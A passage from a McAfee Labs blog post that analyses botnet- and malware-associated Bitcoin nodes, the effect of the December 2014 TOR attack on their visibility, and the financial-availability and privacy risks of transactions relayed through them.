Other host providers include cloud services and public or free Internet hosts. Such services are sought out and used extensively by botmasters as they often allow limited free use, or full subscription use for a defined period (commonly one to three months before they are abandoned or terminated). Indeed, between February and December, 20% of all unique bitnodes we analyzed existed for no more than one day, 72% for less than one month, 99% for less than three months, and less than 1% existed for more than three months.

More on TOR
The coincidence of the TOR network and bitnodes may be more than OSINT demonstrates. For example, In December 2014 the “LizardSquad” hacked the TOR network, taking control of 30% to 40% of active nodes. One effect of the attacks was an increase in new bitnodes.

The following graph illustrates a 4% increase in Normal nodes and a 1% increase in Suspicious nodes, with a 4% decrease in Interesting nodes that occurred on December 26, 2014, when the TOR attacks began.

20151216 Blockchain11

This data could be interpreted to mean that the additional nodes were botnet nodes previously masked by TOR. The new interesting and suspicious nodes were the product of antimalware submissions and blacklist updates that were reported by researchers. By December 30, 2014, the TOR network had recovered, and the number of visible bitnodes decreased as they were again masked; in the interim, however, the aggregate had increased to an estimated 23% of all bitnodes related to botnets.

In effect, the December 2014 attacks by LizardSquad (and subsequent research performed by security organizations around the world) revealed previously unknown nodes on the Bitcoin network, some associated with malware or botnets. This demonstrates the extent (about  6%) of TOR nodes that provided anonymity to blockchain transactions—at least in that period.

What this means for financial risk
Bitcoin has an estimated market cap of $5.4 billion. On December 2, 2015, a total of $634 million (depending on the exchange venue) in transactions value was routed through the global bitnodes. Although only the noted 17% of bitnodes are indicated to be “known associates” of malware or botnets, those nodes accounted for 31% of the volume of (unconfirmed) transactions relayed that day. In other words, almost $200 million of Bitcoin transactions were relayed through suspect nodes.

What does this mean? There is no risk of these funds being stolen because the blockchain has mechanisms to protect the transaction with distributed (and autonomous) processing and validation. There are, however, availability concerns that go beyond simple outages, for example, the possibility of “value” impediments because the route is manipulated in the peer map of related clients. (The exchange value of Bitcoin is related in part to the volume available for trading and the availability of peers to process the transactions.) Outages may be brief, but they have immediate consequences as peer discovery from “good” to “bad” nodes depends fundamentally on the availability of good nodes.

Beyond interruptions, there is the risk of malicious entities gaining insights into transactions. Botmasters can simply monitor the peers that they control to understand the origin and valuable details of the transactions in their exchange form. Although they will not see into traded contracts, or be able to steal from cryptocurrency exchanges, they can monitor who is trading with whom and how often—and potentially control when/if and where their traffic is able to route.

The health of any network is crucial to the integrity of the service it supports. Financial products and services related to the blockchain may be affected by botnet- or malware-associated nodes that relay transactions, currently or in the future, as the sophistication of attacks and exploits continues.

A final note
Much more specific details of risks are available when the blockchain (ledger) and bitnodes are tied to threat intelligence. On December 2 two ransomware payment addresses for Virlock were used in 14 transactions. Five of the 14 transactions were relayed by bitnodes associated with malware or botnets. Although blacklisting Bitcoin addresses can be a difficult proposition (as many addresses have been stolen from legitimate users’ wallets over time and misused in much the same way that stolen credit card numbers are used sporadically by cybercriminals), some insights of specific addresses are useful to understanding the risk of transactions made with otherwise “anonymous” counterparties.

We might conclude from this research that Bitcoin is a payment platform that cannot be trusted, but that is not the case. Yet we depend on a trustworthy payment platform, and understanding the associated risks allow us to build appropriate controls to mitigate those risks to tolerable levels. Bitcoin, much like any other payment platform (electronic as well as physical) has risks associated with it that appear to be specific to a decentralized virtual currency. Our intention is to highlight some of these risks such that measures can be introduced to mitigate those risks to a level acceptable to all of us operating within this digital society.

 

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/feed/ 0